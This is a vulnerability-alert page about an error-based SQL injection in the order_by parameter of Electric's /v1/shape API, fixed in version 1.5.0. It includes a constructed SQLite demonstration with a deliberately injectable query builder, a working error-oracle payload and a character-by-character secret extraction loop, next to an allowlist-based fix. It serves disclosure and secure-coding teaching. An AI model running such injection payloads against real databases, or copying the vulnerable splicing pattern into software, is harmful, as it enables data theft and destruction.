
Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the order_by parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL inject…

Published:

20 April 2026 at 22:00:00

Alert date:

21 April 2026 at 22:04:46

Source:

nvd.nist.gov


Database & Storage, Web Technologies

Electric, a Postgres sync engine, contains a critical SQL injection vulnerability in the order_by parameter of its /v1/shape API endpoint. Versions from 1.1.12 up to, but not including, 1.5.0 are affected. An authenticated caller can supply a crafted ORDER BY expression that the server splices into the query it runs against the underlying PostgreSQL database, which allows error-based SQL injection; through it an attacker can read, modify and destroy the full contents of that database. The issue is fixed in version 1.5.0.

Technical details
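The bug class described above, as an added example that is not code from Electric or from the advisory: a hypothetical shape-query builder that splices the order_by value straight into the statement, an attacker-side error-based oracle that uses that flaw to read a table the request should never touch, and a hardened builder that only accepts order_by terms drawn from a column allowlist. SQLite stands in for Postgres so the block runs offline; the table names, the function names and the zeroblob() error trigger are all constructed for this illustration (a Postgres payload would pick a different failing expression), and nothing here reproduces Electric's actual code or the 1.5.0 fix.

```python
import re
import sqlite3

# Constructed sample database standing in for the synced Postgres schema
# (not Electric's own): one table the shape request may sort on, and one
# table the caller must never be able to reach.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO items VALUES (1, 'pear'), (2, 'apple');
        CREATE TABLE secrets (token TEXT);
        INSERT INTO secrets VALUES ('s3cr3t');
    """)
    return conn


def shape_query_vulnerable(table, order_by):
    """Vulnerable pattern (hypothetical, illustrating the advisory's bug class):
    the caller-supplied order_by text is spliced verbatim into the statement,
    so any SQL expression the caller writes becomes part of the query."""
    return f"SELECT id, name FROM {table} ORDER BY {order_by}"


IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def shape_query_hardened(table, order_by, allowed_columns):
    """Hardened pattern: order_by is parsed as 'column [asc|desc], ...';
    each column must look like a plain identifier and appear in an allowlist
    derived from the table's schema, and the direction must be one of two
    keywords. Only validated, quoted identifiers reach the SQL text."""
    if not IDENT.match(table):
        raise ValueError(f"bad table name: {table!r}")
    clauses = []
    for part in order_by.split(","):
        tokens = part.split()
        if not 1 <= len(tokens) <= 2:
            raise ValueError(f"malformed order_by term: {part!r}")
        column = tokens[0]
        direction = tokens[1].upper() if len(tokens) == 2 else "ASC"
        if not IDENT.match(column) or column not in allowed_columns:
            raise ValueError(f"column not allowed: {column!r}")
        if direction not in ("ASC", "DESC"):
            raise ValueError(f"bad sort direction: {tokens[1]!r}")
        clauses.append(f'"{column}" {direction}')
    return f'SELECT id, name FROM "{table}" ORDER BY {", ".join(clauses)}'


def order_by_accepted(order_by, allowed_columns=frozenset({"id", "name"})):
    """True if the hardened builder accepts the order_by value."""
    try:
        shape_query_hardened("items", order_by, allowed_columns)
        return True
    except ValueError:
        return False


def error_oracle(conn, guess):
    """Attacker-side oracle against the vulnerable builder. The injected
    ORDER BY expression sorts by id when the guessed prefix of secrets.token
    is right; otherwise it evaluates zeroblob() with a size beyond the
    engine's length limit, which makes SQLite abort the query with an error.
    Whether the request errors is all the attacker needs to observe."""
    payload = (
        f"CASE WHEN substr((SELECT token FROM secrets), 1, {len(guess)}) = '{guess}' "
        f"THEN id ELSE zeroblob(9223372036854775807) END"
    )
    try:
        conn.execute(shape_query_vulnerable("items", payload)).fetchall()
        return True
    except sqlite3.Error:
        return False


def extract_secret(conn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=16):
    """Recover secrets.token one character at a time through the oracle."""
    found = ""
    for _ in range(max_len):
        for ch in alphabet:
            if error_oracle(conn, found + ch):
                found += ch
                break
        else:
            return found
    return found


def run_shape(conn, order_by, allowed_columns=frozenset({"id", "name"})):
    """Serve a shape request the safe way: validate order_by, then execute."""
    return conn.execute(shape_query_hardened("items", order_by, allowed_columns)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked through the vulnerable builder:", extract_secret(db))
    print("hardened builder accepts 'name desc, id':", order_by_accepted("name desc, id"))
    print("hardened builder accepts an injected CASE:", order_by_accepted("CASE WHEN 1=1 THEN id ELSE 0 END"))
    print("rows served safely:", run_shape(db, "name desc, id"))
```

The hardened builder never copies request text into the SQL string: the column name is checked against the schema-derived allowlist and then emitted as a quoted identifier, and the direction is reduced to one of two fixed keywords. Parameter binding cannot be used for ORDER BY targets, which is why allowlisting, not escaping, is the right control for this parameter.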

Mitigation steps:

Upgrade Electric to version 1.5.0 or later, which fixes the vulnerability.

Affected products:

Electric
ElectricSQL
PostgreSQL


This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: This website displays information obtained from external sources. Perceptive accepts no responsibility for the content, accuracy or completeness of this information.
